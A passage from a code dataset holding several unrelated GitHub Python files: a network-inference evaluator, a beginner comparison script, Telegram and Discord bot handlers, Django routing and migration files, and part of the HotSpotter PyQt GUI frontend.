Use one of the derived classes\"\"\"\n\n _probs = {}\n\n def __init__(self, network: str = None, p_values_path: str = None, self_loops: bool = False):\n self._self_loops = self_loops\n self._p_values_path = p_values_path\n self._network = network\n self._labels = None\n self._scores = None\n\n def _load_probs(self, metric):\n if metric not in self._probs:\n path = os.path.join(self._p_values_path, \"%s_%s.npy\" % (self._network, metric.lower()))\n data = np.squeeze(np.load(path))\n\n if data.ndim == 1:\n x = np.linspace(0, 1, data.shape[0])\n data = np.vstack((x, data))\n\n self._probs[metric] = data\n\n return self._probs[metric][0, :], self._probs[metric][1, :]\n\n def fit(self, labels, scores):\n if not self._self_loops:\n idx = ~np.eye(labels.shape[0], dtype=bool)\n labels = labels[idx]\n scores = scores[idx]\n\n self._labels = np.asarray(labels, dtype=np.int32).ravel()\n self._scores = np.asarray(scores, dtype=np.float64).ravel()\n\n @property\n def network(self):\n return self._network\n\n @property\n def auroc(self):\n return roc_auc_score(self._labels, self._scores)\n\n @property\n def aupr(self):\n precision, recall, _ = precision_recall_curve(self._labels, self._scores)\n return auc(recall, precision)\n\n @property\n def score(self):\n return -np.mean([np.log10(self.auroc_p_value), np.log10(self.aupr_p_value)])\n\n @property\n def score_aupr(self):\n return -np.log10(self.aupr_p_value)\n\n @property\n def auroc_p_value(self):\n if self._p_values_path is None:\n raise Exception(\"AUROC p-value cannot be computed for this network. \"\n \"This network does not have the p-value distribution.\")\n\n try:\n xs, probs = self._load_probs(\"AUROC\")\n except FileNotFoundError:\n raise Exception(\"AUROC p-value cannot be computed for this network\")\n\n return np.interp(self.auroc, xs, probs)\n\n @property\n def aupr_p_value(self):\n if self._p_values_path is None:\n raise Exception(\"AUPR p-value cannot be computed for this network. \"\n \"This network does not have the p-value distribution.\")\n\n try:\n xs, probs = self._load_probs(\"AUPR\")\n except FileNotFoundError:\n raise Exception(\"AUPR p-value cannot be computed for this network\")\n\n return np.interp(self.aupr, xs, probs)\n\n\nclass DREAM5Evaluator(Evaluator):\n \"\"\"Dream5 Network Evaluation\"\"\"\n def fit(self, labels, scores):\n labels = np.pad(labels, ((0, scores.shape[0] - labels.shape[0]), (0, scores.shape[1] - labels.shape[1])))\n super().fit(labels, scores)\n","repo_name":"msaremi/GENEREF","sub_path":"bionetwork/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19380260417","text":"# Programa: Lê dois valores e imprime qual é o maior.\n\na = int(input('Primeiro valor: '))\nb = int(input('Segundo valor: '))\nif a > b:\n print('O primeiro valor é maior!')\nif b > a:\n print('O segundo valor é maior!')\n\n#Na linha 3 (if a > b:) essa expressão será avaliada, se o seu resultado for verdadeiro, a linha 4 será executada. Se for falso, a linha 4 será ignorada. 
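Editor's note on the Evaluator record above — _probs is a class attribute keyed by metric name alone, so every instance shares one cache, and an evaluator built for a second network would silently reuse the first network's p-value curves. A hedged sketch of the loader with a per-instance cache keyed by (network, metric); the class name is mine:

import os
import numpy as np

class EvaluatorPatched:
    def __init__(self, network=None, p_values_path=None):
        self._network = network
        self._p_values_path = p_values_path
        self._probs = {}  # per-instance cache instead of a shared class attribute

    def _load_probs(self, metric):
        key = (self._network, metric)  # keyed by network AND metric
        if key not in self._probs:
            path = os.path.join(self._p_values_path,
                                "%s_%s.npy" % (self._network, metric.lower()))
            data = np.squeeze(np.load(path))
            if data.ndim == 1:  # same 1-D fallback as the original
                data = np.vstack((np.linspace(0, 1, data.shape[0]), data))
            self._probs[key] = data
        return self._probs[key][0, :], self._probs[key][1, :]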
O mesmo acontece para a condição (if b > a:), se o seu resultado for verdadeiro a linha 6 será executada, se for falso será ignorada.\n","repo_name":"edmilsonlibanio/Ola-Mundo-Python","sub_path":"iapcompython/prog_4_1.py","file_name":"prog_4_1.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32722041671","text":"from telebot import types\n\nfrom buttons import back_button\nfrom deal_actions import actions_with_deals\nfrom deal_actions.actions_with_deals import check_open_deals, active_deal_sell_button_list\nfrom keyboards.keyboards import start_panel_markup\nfrom main import bot\n\n\n@bot.message_handler(func=lambda message: message.text == \"ACTIVE DEALS\")\ndef handle_active_trades(message):\n\tresponse = check_open_deals()\n\n\tsell_button_markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n\n\tif response[0]:\n\t\tactions_with_deals.currency_to_sell_1_module = response[0]\n\t\tactive_deal_sell_button_list.append(response[0])\n\t\tbutton = types.KeyboardButton(f'{response[0]}')\n\t\tsell_button_markup.add(button)\n\n\tif response[-1]:\n\t\tactions_with_deals.currency_to_sell_2_module = response[-1]\n\t\tactive_deal_sell_button_list.append(response[-1])\n\t\tbutton = types.KeyboardButton(f'{response[-1]}')\n\t\tsell_button_markup.add(button)\n\n\tif not active_deal_sell_button_list:\n\t\tbot.send_message(message.chat.id, 'NO ACTIVE DEALS', reply_markup=start_panel_markup)\n\telse:\n\t\tsell_button_markup.add(back_button)\n\t\tbot.send_message(message.chat.id, 'ACTIVE DEALS:', reply_markup=sell_button_markup)\n\n\n@bot.message_handler(func=lambda message: message.text == f\"{actions_with_deals.currency_to_sell_1_module}\")\ndef handle_sell_first(message):\n\tsymbol = actions_with_deals.currency_to_sell_1_module\n\tresponse = f'CHOOSE ACTION FOR {symbol}'\n\tchoose_action_markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n\tsell_now_button = types.KeyboardButton(f'SELL {symbol} NOW')\n\tlimit_button = types.KeyboardButton(f'LIMIT ORDER {symbol}')\n\tchoose_action_markup.add(sell_now_button, limit_button, back_button)\n\tbot.send_message(message.chat.id, response, reply_markup=choose_action_markup)\n","repo_name":"wickedwicked26/telegram-control-bot","sub_path":"deal_actions/handlers/deal_action_handlers.py","file_name":"deal_action_handlers.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23268120105","text":"import discord\nimport os\nimport imgurpython\nimport requests\nfrom discord.ext import commands\nimport random\nimport praw\nfrom textblob import TextBlob\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv('../.env'))\nCLIENT_ID = os.environ['REDDIT_CLIENT_ID']\nCLIENT_SECRET = os.environ['REDDIT_CLIENT_SECRET']\nUSER_AGENT = os.environ['REDDIT_USER_AGENT']\nIMGUR_ID = os.environ['IMGUR_CLIENT_ID']\nIMGUR_SECRET = os.environ['IMGUR_CLIENT_SECRET']\n\nclass Fun(commands.Cog):\n \"\"\"Stuff that's fun\"\"\"\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=['8ball'])\n async def _8ball(self, ctx, *, question):\n \"\"\"Magic 8ball\"\"\"\n responses = [\"It is certain.\",\n \"It is decidedly so.\",\n \"Without a doubt.\",\n \"Yes - definitely.\",\n \"You may rely on it.\",\n \"As I see it, yes.\",\n \"Most likely.\",\n \"Outlook good.\",\n \"Yes.\",\n \"Signs point to yes.\",\n \"Reply hazy, try again.\",\n \"Ask 
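Editor's note on prog_4_1.py above — each `if` is evaluated independently, so when the two values are equal neither branch fires and nothing is printed. A sketch covering the tie with if/elif/else (output strings kept in the file's Portuguese):

a = int(input('Primeiro valor: '))
b = int(input('Segundo valor: '))
if a > b:
    print('O primeiro valor é maior!')
elif b > a:
    print('O segundo valor é maior!')
else:
    print('Os valores são iguais!')  # the tie the original never reports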
again later.\",\n \"Better not tell you now.\",\n \"Cannot predict now.\",\n \"Concentrate and ask again.\",\n \"Don't count on it.\",\n \"My reply is no.\",\n \"My sources say no.\",\n \"Outlook not so good.\",\n \"Very doubtful.\"]\n res = discord.Embed(title=f'Question : **{question}**',description=f'Answer: **{random.choice(responses)}**')\n await ctx.send(embed=res)\n\n @commands.command()\n async def meme(self, ctx):\n \"\"\"Gets memes from Reddit\"\"\"\n reddit = praw.Reddit(client_id=REDDIT_CLIENT_ID, client_secret=REDDIT_CLIENT_SECRET,\n user_agent=REDDIT_USER_AGENT, check_for_async=False)\n post = reddit.subreddit(\n 'memes+dankmemes+me_irl+MadeMeSmile+cursedcomments').hot(limit=20)\n post = [i for i in post]\n post = random.choice(post)\n res = discord.Embed(\n title=f'**{post.title}**', url=f'https://reddit.com{post.permalink}', colour=discord.Colour(0x000000))\n res.set_footer(text=f'{post.score} 👍')\n res.set_image(url=post.url)\n await ctx.send(embed=res)\n\n @commands.command()\n async def joke(self, ctx):\n \"\"\"Returns a joke from r/Jokes and r/darkjokes\"\"\"\n reddit = praw.Reddit(client_id=REDDIT_CLIENT_ID, client_secret=REDDIT_CLIENT_SECRET,\n user_agent=REDDIT_USER_AGENT, check_for_async=False)\n\n post = reddit.subreddit('Jokes+darkjokes').hot(limit=30)\n post = [i for i in post]\n post = random.choice(post)\n\n res = discord.Embed(\n title=f'**{post.title}**', url=f'https://reddit.com{post.permalink}', description=post.selftext, colour=discord.Colour(0x000000))\n await ctx.send(embed=res)\n\n @commands.command(aliases=[\"senti\"])\n async def sentiment(self, ctx, *, sentence):\n \"\"\"Returns sentiment of a sentence\"\"\"\n if sentence:\n words = TextBlob(sentence)\n res = discord.Embed(title=f'{sentence}', description= f'Calculated sentiment {words.sentiment.polarity}')\n res.set_footer(text=\"If value>0 then positive, <0 then negative and =0 then neutral sentiment\")\n await ctx.send(embed=res)\n @commands.command()\n async def imgur(self, ctx, *, query):\n \"\"\"Returns an image from imgur\"\"\"\n if query:\n client = imgurpython.ImgurClient(IMGUR_ID,IMGUR_SECRET)\n items = client.gallery_search(query)[:]\n post = random.choice(items)\n res = discord.Embed(title=post.title)\n res.set_image(url=post.link)\n await ctx.send(post.link)\n\ndef setup(client):\n client.add_cog(Fun(client))\n","repo_name":"sidhant-sriv/Discord-Bot","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31786959938","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport multiple.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Cliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Nombre', models.CharField(max_length=50, verbose_name=b'Nombre')),\n ('Foto', multiple.utils.NMImageField(upload_to=multiple.utils.content_file_name)),\n ],\n options={\n 'verbose_name': 'Cliente',\n 'verbose_name_plural': 'Clientes',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"MikeVelazcoMtz/multiple","sub_path":"multiple/apps/usuarios/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"5980549921","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"listings/\", views.listing, name=\"listing\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"add/\", views.addToWatchlist, name=\"addToWatchlist\"),\n path(\"remove/\", views.removeWatchlist, name=\"removeWatchlist\"),\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"category/\", views.category, name=\"category\"),\n path(\"close/\", views.closeListing, name=\"close\"),\n path(\"closedListing/\", views.closedListing, name=\"closedListing\"),\n path(\"comment/\", views.addComent, name=\"comment\"),\n]\n","repo_name":"MoazHassan2022/commerce","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25831676541","text":"\nfrom hscom import __common__\n(print, print_, print_on, print_off,\n rrr, profile, printDBG) = __common__.init(__name__, '[front]', DEBUG=False)\n# Python\nimport sys\n# Qt\nif 0:\n from PyQt4 import QtGui, QtCore\n from PyQt4.Qt import (QAbstractItemView, pyqtSignal, Qt)\n from PyQt5.QtGui import QMainWindow\n from PyQt5.QtGui import QTableWidgetItem\n QtWidgets = QtGui\nelse:\n from matplotlib.backends import backend_qt5 as backend_qt\n from PyQt5 import QtCore\n from PyQt5 import QtGui\n from PyQt5.QtCore import *\n from PyQt5.QtGui import *\n from PyQt5.QtWidgets import *\n from PyQt5.QtWidgets import QMainWindow\n from PyQt5.QtWidgets import QTableWidgetItem\n from PyQt5 import QtWidgets\n QtWidgets.QApplication.UnicodeUTF8 = -1\n\n# HotSpotter\nfrom ._frontend.MainSkel import Ui_mainSkel\nfrom . 
import guitools\nfrom .guitools import slot_\nfrom .guitools import frontblocking as blocking\nfrom hscom import tools\n\n#=================\n# Globals\n#=================\n\nIS_INIT = False\nNOSTEAL_OVERRIDE = False # Hard disable switch for stream stealer\n\n\n#=================\n# Decorators / Helpers\n#=================\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n _fromUtf8 = lambda s: s\n\ndef clicked(func):\n def clicked_wrapper(front, item, *args, **kwargs):\n if front.isItemEditable(item):\n front.print('[front] does not select when clicking editable column')\n return\n if item == front.prev_tbl_item:\n return\n front.prev_tbl_item = item\n return func(front, item, *args, **kwargs)\n clicked_wrapper.__name__ = func.__name__\n # Hacky decorator\n return clicked_wrapper\n\n\ndef csv_sanatize(str_):\n return str(str_).replace(',', ';;')\n\n\n#=================\n# Stream Stealer\n#=================\nimport logging\n\n\nclass GUILoggingSender(QtCore.QObject):\n write_ = QtCore.pyqtSignal(str)\n\n def __init__(self, front):\n super(GUILoggingSender, self).__init__()\n self.write_.connect(front.gui_write)\n\n def write_gui(self, msg):\n self.write_.emit(str(msg))\n\n\nclass GUILoggingHandler(logging.StreamHandler):\n \"\"\"\n A handler class which sends messages to to a connected QSlot\n \"\"\"\n def __init__(self, front):\n super(GUILoggingHandler, self).__init__()\n self.sender = GUILoggingSender(front)\n\n def emit(self, record):\n try:\n msg = self.format(record) + '\\n'\n self.sender.write_.emit(msg)\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n\nclass StreamStealer(QtCore.QObject):\n write_ = QtCore.pyqtSignal(str)\n flush_ = QtCore.pyqtSignal()\n\n def __init__(self, front, parent=None, share=False):\n super(StreamStealer, self).__init__(parent)\n # Define the Stream Stealer write function\n if share:\n self.write = self.write_shared\n else:\n self.write = self.write_gui\n self.write_.connect(front.gui_write)\n self.flush_.connect(front.gui_flush)\n # Do the stealing\n #stream_holder = sys\n #try:\n #__IPYTHON__\n #print('[front] detected __IPYTHON__')\n #from IPython.utils import io as iio\n #stream_holder = iio.IOTerm(None, self)\n #return\n #except NameError:\n #print('[front] did not detect __IPYTHON__')\n #pass\n #except Exception as ex:\n #print(ex)\n #raise\n\n # Remember which stream you've stolen\n self.iostream = sys.stdout\n self.iostream2 = sys.stderr\n # Redirect standard out to the StreamStealer object\n sys.stderr = self\n sys.stdout = self\n #steam_holder.stdout\n\n def write_shared(self, msg):\n msg_ = str(str(msg))\n self.iostream.write(msg_)\n self.write_.emit(msg_)\n\n def write_gui(self, msg):\n self.write_.emit(str(msg))\n\n def flush(self):\n self.flush_.emit()\n\n\ndef _steal_stdout(front):\n from hscom import params\n #front.ui.outputEdit.setPlainText(sys.stdout)\n nosteal = params.args.nosteal\n noshare = params.args.noshare\n if '--cmd' in sys.argv:\n nosteal = noshare = True\n #from IPython.utils import io\n #with io.capture_output() as captured:\n #%run my_script.py\n if NOSTEAL_OVERRIDE or (nosteal and noshare):\n print('[front] not stealing stdout.')\n return\n print('[front] stealing standard out')\n if front.ostream is None:\n # Connect a StreamStealer object to the GUI output window\n if '--nologging' in sys.argv:\n front.ostream = StreamStealer(front, share=not noshare)\n else:\n front.gui_logging_handler = GUILoggingHandler(front)\n 
__common__.add_logging_handler(front.gui_logging_handler)\n else:\n print('[front] stream already stolen')\n\n\ndef _return_stdout(front):\n #front.ui.outputEdit.setPlainText(sys.stdout)\n print('[front] returning standard out')\n if front.ostream is not None:\n sys.stdout = front.ostream.iostream\n sys.stderr = front.ostream.iostream2\n front.ostream = None\n return True\n else:\n print('[front] stream has not been stolen')\n return False\n\n\n#=================\n# Initialization\n#=================\n\n\ndef init_ui(front):\n ui = Ui_mainSkel()\n ui.setupUi(front)\n return ui\n\n\ndef connect_file_signals(front):\n ui = front.ui\n back = front.back\n ui.actionNew_Database.triggered.connect(back.new_database)\n ui.actionOpen_Database.triggered.connect(back.open_database)\n ui.actionSave_Database.triggered.connect(back.save_database)\n ui.actionImport_Img_file.triggered.connect(back.import_images_from_file)\n ui.actionImport_Img_dir.triggered.connect(back.import_images_from_dir)\n ui.actionQuit.triggered.connect(back.quit)\n\n\ndef connect_action_signals(front):\n ui = front.ui\n back = front.back\n ui.actionAdd_Chip.triggered.connect(back.add_chip)\n ui.actionNew_Chip_Property.triggered.connect(back.new_prop)\n ui.actionQuery.triggered.connect(back.query)\n ui.actionReselect_Ori.triggered.connect(back.reselect_ori)\n ui.actionReselect_ROI.triggered.connect(back.reselect_roi)\n ui.actionDelete_Chip.triggered.connect(back.delete_chip)\n ui.actionDelete_Image.triggered.connect(back.delete_image)\n ui.actionNext.triggered.connect(back.select_next)\n\n\ndef connect_option_signals(front):\n ui = front.ui\n back = front.back\n ui.actionLayout_Figures.triggered.connect(back.layout_figures)\n ui.actionPreferences.triggered.connect(back.edit_preferences)\n #ui.actionTogPts.triggered.connect(back.toggle_points)\n\n\ndef connect_help_signals(front):\n ui = front.ui\n back = front.back\n msg_event = lambda title, msg: lambda: guitools.msgbox(title, msg)\n ui.actionView_Docs.triggered.connect(back.view_docs)\n ui.actionView_DBDir.triggered.connect(back.view_database_dir)\n ui.actionView_Computed_Dir.triggered.connect(back.view_computed_dir)\n ui.actionView_Global_Dir.triggered.connect(back.view_global_dir)\n\n ui.actionAbout.triggered.connect(msg_event('About', 'hotspotter'))\n ui.actionDelete_computed_directory.triggered.connect(back.delete_cache)\n ui.actionDelete_global_preferences.triggered.connect(back.delete_global_prefs)\n ui.actionDelete_Precomputed_Results.triggered.connect(back.delete_queryresults_dir)\n ui.actionDev_Mode_IPython.triggered.connect(back.dev_mode)\n ui.actionDeveloper_Reload.triggered.connect(back.dev_reload)\n #Taken care of by add_action ui.actionDetect_Duplicate_Images.triggered.connect(back.detect_dupimg)\n #ui.actionWriteLogs.triggered.connect(back.write_logs)\n\n\ndef connect_batch_signals(front):\n ui = front.ui\n back = front.back\n #ui.actionBatch_Change_Name.triggered.connect(back.batch_rename)\n ui.actionPrecomputeChipsFeatures.triggered.connect(back.precompute_feats)\n ui.actionPrecompute_Queries.triggered.connect(back.precompute_queries)\n #ui.actionScale_all_ROIS.triggered.connect(back.expand_rois)\n #ui.actionConvert_all_images_into_chips.triggered.connect(back.convert_images2chips)\n #ui.actionAddMetaProp.triggered.connect(back.add_chip_property)\n #ui.actionAutoassign.triggered.connect(back.autoassign)\n\n\ndef connect_experimental_signals(front):\n ui = front.ui\n back = front.back\n ui.actionMatching_Experiment.triggered.connect(back.actionRankErrorExpt)\n 
ui.actionName_Consistency_Experiment.triggered.connect(back.autoassign)\n\n\n#def popup(front, pos):\n #for i in front.ui.gxs_TBL.selectionModel().selection().indexes():\n #front.print(repr((i.row(), i.column())))\n #menu = QtWidgets.QMenu()\n #action1 = menu.addAction(\"action1\")\n #action2 = menu.addAction(\"action2\")\n #action3 = menu.addAction(\"action2\")\n #action = menu.exec_(front.ui.gxs_TBL.mapToGlobal(pos))\n #front.print('action = %r ' % action)\n\ndef new_menu_action(front, menu_name, name, text=None, shortcut=None, slot_fn=None):\n # Dynamically add new menu actions programatically\n action_name = name\n action_text = text\n action_shortcut = shortcut\n ui = front.ui\n if hasattr(ui, action_name):\n raise Exception('menu action already defined')\n action = QtWidgets.QAction(front)\n setattr(ui, action_name, action)\n action.setShortcutContext(QtCore.Qt.ApplicationShortcut)\n action.setObjectName(_fromUtf8(action_name))\n menu = getattr(ui, menu_name)\n menu.addAction(action)\n if action_text is None:\n action_text = action_name\n # TODO: Have ui.retranslate call this\n def retranslate_fn():\n printDBG('retranslating %s' % name)\n action.setText(QtWidgets.QApplication.translate(\"mainSkel\", action_text, None, QtWidgets.QApplication.UnicodeUTF8))\n if action_shortcut is not None:\n action.setShortcut(QtWidgets.QApplication.translate(\"mainSkel\", action_shortcut, None, QtWidgets.QApplication.UnicodeUTF8))\n def connect_fn():\n printDBG('connecting %s' % name)\n action.triggered.connect(slot_fn)\n connect_fn.__name__ = name + '_' + connect_fn.__name__\n retranslate_fn.__name__ = name + '_' + retranslate_fn.__name__\n front.connect_fns.append(connect_fn)\n front.retranslatable_fns.append(retranslate_fn)\n retranslate_fn()\n\n\ndef set_tabwidget_text(front, tblname, text):\n printDBG('[front] set_tabwidget_text(%s, %s)' % (tblname, text))\n tablename2_tabwidget = {\n 'gxs': front.ui.image_view,\n 'cxs': front.ui.chip_view,\n 'nxs': front.ui.name_view,\n 'res': front.ui.result_view,\n }\n ui = front.ui\n tab_widget = tablename2_tabwidget[tblname]\n tab_index = ui.tablesTabWidget.indexOf(tab_widget)\n tab_text = QtWidgets.QApplication.translate(\"mainSkel\", text, None,\n QtWidgets.QApplication.UnicodeUTF8)\n ui.tablesTabWidget.setTabText(tab_index, tab_text)\n\n\nclass MainWindowFrontend(QMainWindow):\n printSignal = pyqtSignal(str)\n quitSignal = pyqtSignal()\n selectGxSignal = pyqtSignal(int)\n selectCidSignal = pyqtSignal(int)\n selectResSignal = pyqtSignal(int)\n selectNameSignal = pyqtSignal(str)\n changeCidSignal = pyqtSignal(int, str, str)\n aliasNameSignal = pyqtSignal(int, str, str)\n changeGxSignal = pyqtSignal(int, str, bool)\n querySignal = pyqtSignal()\n\n def __init__(front, back):\n super(MainWindowFrontend, front).__init__()\n #print('[*front] creating frontend')\n front.prev_tbl_item = None\n front.ostream = None\n front.gui_logging_handler = None\n front.back = back\n front.ui = init_ui(front)\n # Programatially Defined Actions\n front.retranslatable_fns = []\n front.connect_fns = []\n new_menu_action(front, 'menuHelp', 'actionDetect_Duplicate_Images',\n text='Detect Duplicate Images', slot_fn=back.detect_dupimg)\n # Progress bar is not hooked up yet\n front.ui.progressBar.setVisible(False)\n front.connect_signals()\n front.steal_stdout()\n\n def steal_stdout(front):\n return _steal_stdout(front)\n\n def return_stdout(front):\n return _return_stdout(front)\n\n # TODO: this code is duplicated in back\n def user_info(front, *args, **kwargs):\n return 
guitools.user_info(front, *args, **kwargs)\n\n def user_input(front, *args, **kwargs):\n return guitools.user_input(front, *args, **kwargs)\n\n def user_option(front, *args, **kwargs):\n return guitools.user_option(front, *args, **kwargs)\n\n @slot_()\n def closeEvent(front, event):\n #front.printSignal.emit('[*front] closeEvent')\n event.accept()\n front.quitSignal.emit()\n\n def connect_signals(front):\n # Connect signals to slots\n back = front.back\n ui = front.ui\n # Frontend Signals\n front.printSignal.connect(back.backend_print)\n front.quitSignal.connect(back.quit)\n front.selectGxSignal.connect(back.select_gx)\n front.selectCidSignal.connect(back.select_cid)\n front.selectResSignal.connect(back.select_res_cid)\n front.selectNameSignal.connect(back.select_name)\n front.changeCidSignal.connect(back.change_chip_property)\n front.aliasNameSignal.connect(back.alias_name)\n front.changeGxSignal.connect(back.change_image_property)\n front.querySignal.connect(back.query)\n\n # Menubar signals\n connect_file_signals(front)\n connect_action_signals(front)\n connect_option_signals(front)\n connect_batch_signals(front)\n #connect_experimental_signals(front)\n connect_help_signals(front)\n for func in front.connect_fns:\n func()\n #\n # Gui Components\n # Tables Widgets\n ui.cxs_TBL.itemClicked.connect(front.chip_tbl_clicked)\n ui.cxs_TBL.itemChanged.connect(front.chip_tbl_changed)\n ui.gxs_TBL.itemClicked.connect(front.img_tbl_clicked)\n ui.gxs_TBL.itemChanged.connect(front.img_tbl_changed)\n ui.res_TBL.itemClicked.connect(front.res_tbl_clicked)\n ui.res_TBL.itemChanged.connect(front.res_tbl_changed)\n ui.nxs_TBL.itemClicked.connect(front.name_tbl_clicked)\n ui.nxs_TBL.itemChanged.connect(front.name_tbl_changed)\n # Tab Widget\n ui.tablesTabWidget.currentChanged.connect(front.change_view)\n ui.cxs_TBL.sortByColumn(0, Qt.AscendingOrder)\n ui.res_TBL.sortByColumn(0, Qt.AscendingOrder)\n ui.gxs_TBL.sortByColumn(0, Qt.AscendingOrder)\n\n def print(front, msg):\n print('[*front*] ' + msg)\n #front.printSignal.emit('[*front] ' + msg)\n\n @slot_(bool)\n def setEnabled(front, flag):\n #front.printDBG('setEnabled(%r)' % flag)\n ui = front.ui\n # Enable or disable all actions\n for uikey in list(ui.__dict__.keys()):\n if uikey.find('action') == 0:\n ui.__dict__[uikey].setEnabled(flag)\n\n # The following options are always enabled\n ui.actionOpen_Database.setEnabled(True)\n ui.actionNew_Database.setEnabled(True)\n ui.actionQuit.setEnabled(True)\n ui.actionAbout.setEnabled(True)\n ui.actionView_Docs.setEnabled(True)\n ui.actionDelete_global_preferences.setEnabled(True)\n\n # The following options are no implemented. 
Disable them\n ui.actionConvert_all_images_into_chips.setEnabled(False)\n ui.actionBatch_Change_Name.setEnabled(False)\n ui.actionScale_all_ROIS.setEnabled(False)\n ui.actionWriteLogs.setEnabled(False)\n ui.actionAbout.setEnabled(False)\n #ui.actionView_Docs.setEnabled(False)\n\n @slot_(str, list, list, list, list)\n @blocking\n def populate_tbl(front, tblname, col_fancyheaders, col_editable,\n row_list, datatup_list):\n #front.printDBG('populate_tbl(%s)' % table_name)\n tblname = str(tblname)\n fancytab_dict = {\n 'gxs': 'Image Table',\n 'cxs': 'Chip Table',\n 'nxs': 'Name Table',\n 'res': 'Query Results Table',\n }\n tbl_dict = {\n 'gxs': front.ui.gxs_TBL,\n 'cxs': front.ui.cxs_TBL,\n 'nxs': front.ui.nxs_TBL,\n 'res': front.ui.res_TBL,\n }\n tbl = tbl_dict[tblname]\n #try:\n #tbl = front.ui.__dict__['%s_TBL' % tblname]\n #except KeyError:\n #ui_keys = front.ui.__dict__.keys()\n #tblname_list = [key for key in ui_keys if key.find('_TBL') >= 0]\n #msg = '\\n'.join(['Invalid tblname = %s_TBL' % tblname,\n #'valid names:\\n ' + '\\n '.join(tblname_list)])\n #raise Exception(msg)\n front._populate_table(tbl, col_fancyheaders, col_editable, row_list, datatup_list)\n # Set the tab text to show the number of items listed\n text = fancytab_dict[tblname] + ' : %d' % len(row_list)\n set_tabwidget_text(front, tblname, text)\n\n def _populate_table(front, tbl, col_fancyheaders, col_editable, row_list, datatup_list):\n # TODO: for chip table: delete metedata column\n # RCOS TODO:\n # I have a small right-click context menu working\n # Maybe one of you can put some useful functions in these?\n # RCOS TODO: How do we get the clicked item on a right click?\n # RCOS TODO:\n # The data tables should not use the item model\n # Instead they should use the more efficient and powerful\n # QAbstractItemModel / QAbstractTreeModel\n def set_header_context_menu(hheader):\n hheader.setContextMenuPolicy(Qt.CustomContextMenu)\n opt2_callback = [\n ('header', lambda: print('finishme')),\n ('cancel', lambda: print('cancel')), ]\n popup_slot = guitools.popup_menu(tbl, opt2_callback)\n hheader.customContextMenuRequested.connect(popup_slot)\n\n def set_table_context_menu(tbl):\n tbl.setContextMenuPolicy(Qt.CustomContextMenu)\n opt2_callback = [\n ('Query', front.querySignal.emit), ]\n popup_slot = guitools.popup_menu(tbl, opt2_callback)\n tbl.customContextMenuRequested.connect(popup_slot)\n\n hheader = tbl.horizontalHeader()\n #set_header_context_menu(hheader)\n #set_table_context_menu(tbl)\n\n sort_col = hheader.sortIndicatorSection()\n sort_ord = hheader.sortIndicatorOrder()\n tbl.sortByColumn(0, Qt.AscendingOrder) # Basic Sorting\n tblWasBlocked = tbl.blockSignals(True)\n tbl.clear()\n tbl.setColumnCount(len(col_fancyheaders))\n tbl.setRowCount(len(row_list))\n tbl.verticalHeader().hide()\n tbl.setHorizontalHeaderLabels(col_fancyheaders)\n tbl.setSelectionMode(QAbstractItemView.SingleSelection)\n tbl.setSelectionBehavior(QAbstractItemView.SelectRows)\n tbl.setSortingEnabled(False)\n #dbg_col2_dtype = {}\n #def DEBUG_COL_DTYPE(col, dtype):\n #if not dtype in dbg_col2_dtype:\n #dbg_col2_dtype[dtype] = [col]\n #else:\n #if not col in dbg_col2_dtype[dtype]:\n #dbg_col2_dtype[dtype].append(col)\n # Add items for each row and column\n for row in iter(row_list):\n data_tup = datatup_list[row]\n for col, data in enumerate(data_tup):\n item = QTableWidgetItem()\n # RCOS TODO: Pass in datatype here.\n # BOOLEAN DATA\n if tools.is_bool(data) or data == 'True' or data == 'False':\n check_state = Qt.Checked if bool(data) else 
